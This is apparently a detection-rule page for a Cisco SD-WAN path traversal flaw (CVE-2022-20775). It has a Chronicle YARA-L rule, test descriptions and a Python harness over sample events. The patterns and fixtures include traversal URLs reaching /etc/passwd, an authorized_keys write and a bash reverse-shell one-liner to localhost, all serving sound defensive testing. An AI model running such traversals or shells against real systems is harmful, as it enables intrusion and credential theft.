CVE-2022-20775 Google Chronicle · YARA-L

Detect CVE-2022-20775 — Cisco SD-WAN Path Traversal Exploitation Attempt in Google Chronicle

Detects exploitation attempts targeting CVE-2022-20775, a path traversal vulnerability (CWE-25, CWE-282) in Cisco SD-WAN software. Successful exploitation may allow an authenticated attacker to read or write arbitrary files on the underlying operating system, potentially leading to privilege escalation or persistent access. This CVE is listed in CISA's Known Exploited Vulnerabilities catalog.

MITRE ATT&CK

Tactics: Initial Access, Privilege Escalation, Defense Evasion

YARA-L Detection Query

Google Chronicle (YARA-L)
rule cisco_sdwan_path_traversal_cve_2022_20775 {
  meta:
    author = "df00tech"
    description = "Detects CVE-2022-20775 Cisco SD-WAN path traversal exploitation"
    severity = "CRITICAL"
    reference = "https://nvd.nist.gov/vuln/detail/CVE-2022-20775"

  events:
    (
      // Path traversal in SD-WAN API requests. UDM carries the request URL in
      // target.url; (?i) also catches upper-case %2E/%2F encodings.
      ($e1.metadata.event_type = "NETWORK_HTTP" and
       re.regex($e1.target.url, `(?i)(\.\./|%2e%2e%2f|%252e%252e|\.\.%2f)`) and
       re.regex($e1.target.url, `/(dataservice|template|device|vmanage)`))
      or
      // Suspicious child process from SD-WAN daemon (principal = parent, target = child)
      ($e1.metadata.event_type = "PROCESS_LAUNCH" and
       re.regex($e1.principal.process.file.full_path, `(vdaemon|vmanage|vbond|vsmart)`) and
       re.regex($e1.target.process.file.full_path, `/(bin/)?(bash|sh|python3?|curl|wget|nc)$`))
      or
      // Sensitive file read or write from an SD-WAN process. FILE_MODIFICATION is
      // included so a traversal write (e.g. to authorized_keys) is not missed.
      (($e1.metadata.event_type = "FILE_OPEN" or $e1.metadata.event_type = "FILE_MODIFICATION") and
       re.regex($e1.principal.process.file.full_path, `(vdaemon|vmanage)`) and
       re.regex($e1.target.file.full_path, `(/etc/passwd|/etc/shadow|/root/|/\.ssh/)`))
    )

  condition:
    $e1
}
Severity: critical · Confidence: high

Chronicle YARA-L rule detecting path traversal exploitation attempts against Cisco SD-WAN APIs, suspicious process spawning by SD-WAN daemons, and sensitive file access from SD-WAN process context.

Data Sources

  • Chronicle UDM
  • Network HTTP Events
  • Endpoint Process Events

Required Tables

UDM Events

False Positives & Tuning

  • Legitimate vManage API calls using encoded characters from orchestration platforms
  • Authorized diagnostic scripts executed under SD-WAN service accounts by network operations teams
  • SD-WAN telemetry collectors accessing system statistics files under the vdaemon process

Testing Methodology

Validate this detection against the four Atomic Red Team tests below. Each test lists the behaviour to exercise and the telemetry you should expect to see. Executable commands and cleanup steps are available with Pro.

  1. Test 1: Cisco SD-WAN vManage Path Traversal File Read via API

    Expected signal: HTTP request log entry with traversal sequence in URI; if successful, HTTP 200 response with /etc/passwd content; file access audit event for /etc/passwd by vManage process

  2. Test 2: Cisco SD-WAN Percent-Encoded Path Traversal Bypass

    Expected signal: HTTP access log entry with double-encoded sequence; IDS/WAF alert if deployed; server-side decode of %25 sequences visible in application logs

  3. Test 3: SD-WAN Post-Exploitation SSH Key Injection via Traversal Write

    Expected signal: HTTP POST to path traversal URI; file modification event on /root/.ssh/authorized_keys; audit log entry showing vManage process writing to /root/.ssh/

  4. Test 4: Simulate SD-WAN Daemon Spawning Reverse Shell

    Expected signal: Process creation event: parent=vmanage, child=bash with -i flag and TCP redirect in command line; network connection from bash process to 127.0.0.1:4444; EDR alert on shell spawned by non-interactive parent
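The following is an added example, not part of the original page or the df00tech rule package: a Python reimplementation of the three YARA-L branches, run over constructed UDM-shaped events that stand in for the telemetry each of the four tests above should produce (plus one benign vManage API call that must not fire). Hostnames, paths, IPs and event ids are made up. The escapes_root() helper is an added triage step that goes beyond the rule: it percent-decodes the URL path up to two layers (so the double-encoded %252e from Test 2 becomes a real dot-dot) and checks whether the traversal actually climbs above the API root, which separates an orchestration call that merely contains an encoded ../ from one that reaches the filesystem.

```python
import re
from urllib.parse import unquote, urlsplit

# Regexes mirror the three branches of the YARA-L rule above (RE2 syntax is a
# subset of Python's re for these patterns). (?i) covers upper-case %2E/%2F.
TRAVERSAL_RE = re.compile(r"(?i)(\.\./|%2e%2e%2f|%252e%252e|\.\.%2f)")
SDWAN_API_RE = re.compile(r"/(dataservice|template|device|vmanage)")
SDWAN_DAEMON_RE = re.compile(r"(vdaemon|vmanage|vbond|vsmart)")
SHELL_RE = re.compile(r"/(bin/)?(bash|sh|python3?|curl|wget|nc)$")
SENSITIVE_FILE_RE = re.compile(r"(/etc/passwd|/etc/shadow|/root/|/\.ssh/)")
FILE_EVENT_TYPES = {"FILE_OPEN", "FILE_MODIFICATION"}

# Constructed UDM-shaped events, one per test above plus a benign API call.
# Hostnames, paths and IPs are made up for the example (assumption).
SAMPLE_EVENTS = [
    {"id": "t1", "metadata": {"event_type": "NETWORK_HTTP"},
     "target": {"url": "https://vmanage.example.net/dataservice/../../../../etc/passwd"}},
    {"id": "t2", "metadata": {"event_type": "NETWORK_HTTP"},
     "target": {"url": "https://vmanage.example.net/dataservice/%252e%252e/%252e%252e/etc/passwd"}},
    {"id": "t3", "metadata": {"event_type": "FILE_MODIFICATION"},
     "principal": {"process": {"file": {"full_path": "/usr/share/vmanage/bin/vmanage"}}},
     "target": {"file": {"full_path": "/root/.ssh/authorized_keys"}}},
    {"id": "t4", "metadata": {"event_type": "PROCESS_LAUNCH"},
     "principal": {"process": {"file": {"full_path": "/usr/sbin/vdaemon"}}},
     "target": {"process": {"file": {"full_path": "/bin/bash"},
                            "command_line": "bash -i >& /dev/tcp/127.0.0.1/4444 0>&1"}}},
    {"id": "benign", "metadata": {"event_type": "NETWORK_HTTP"},
     "target": {"url": "https://vmanage.example.net/dataservice/device/monitor?deviceId=10.1.1.1"}},
]


def field(event, dotted):
    """Read a dotted UDM path; a missing field reads as "" like an unset UDM field."""
    cur = event
    for key in dotted.split("."):
        if not isinstance(cur, dict):
            return ""
        cur = cur.get(key, "")
    return cur if isinstance(cur, str) else ""


def decode_layers(text, max_layers=2):
    """Percent-decode repeatedly so %252e (double-encoded '.') becomes '.'."""
    for _ in range(max_layers):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text


def escapes_root(url):
    """Triage helper (not in the rule): does the decoded path climb above '/'?"""
    depth = 0
    for segment in decode_layers(urlsplit(url).path).split("/"):
        if segment == "..":
            depth -= 1
            if depth < 0:
                return True
        elif segment and segment != ".":
            depth += 1
    return False


def evaluate(event):
    """Return the matching branch for one event, or None (the rule's condition)."""
    event_type = field(event, "metadata.event_type")
    if event_type == "NETWORK_HTTP":
        url = field(event, "target.url")
        if TRAVERSAL_RE.search(url) and SDWAN_API_RE.search(url):
            return {"branch": "http_traversal", "escapes_root": escapes_root(url)}
    elif event_type == "PROCESS_LAUNCH":
        parent = field(event, "principal.process.file.full_path")
        child = field(event, "target.process.file.full_path")
        if SDWAN_DAEMON_RE.search(parent) and SHELL_RE.search(child):
            return {"branch": "daemon_spawned_shell"}
    elif event_type in FILE_EVENT_TYPES:
        parent = field(event, "principal.process.file.full_path")
        path = field(event, "target.file.full_path")
        if re.search(r"(vdaemon|vmanage)", parent) and SENSITIVE_FILE_RE.search(path):
            return {"branch": "sensitive_file_access"}
    return None


def run(events):
    """Map event id -> match detail for every event the rule would fire on."""
    hits = {}
    for event in events:
        result = evaluate(event)
        if result is not None:
            hits[event["id"]] = result
    return hits


if __name__ == "__main__":
    for event_id, detail in run(SAMPLE_EVENTS).items():
        print(event_id, detail)
```

Running it fires on t1 through t4 and stays silent on the benign call, which contains /dataservice/device/ but no traversal sequence. Note that the Test 3 write lands as a FILE_MODIFICATION event, not a FILE_OPEN, so a rule branch limited to FILE_OPEN would miss it; the escapes_root flag is what you would surface to the analyst to decide between the first and second tuning bullets above.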
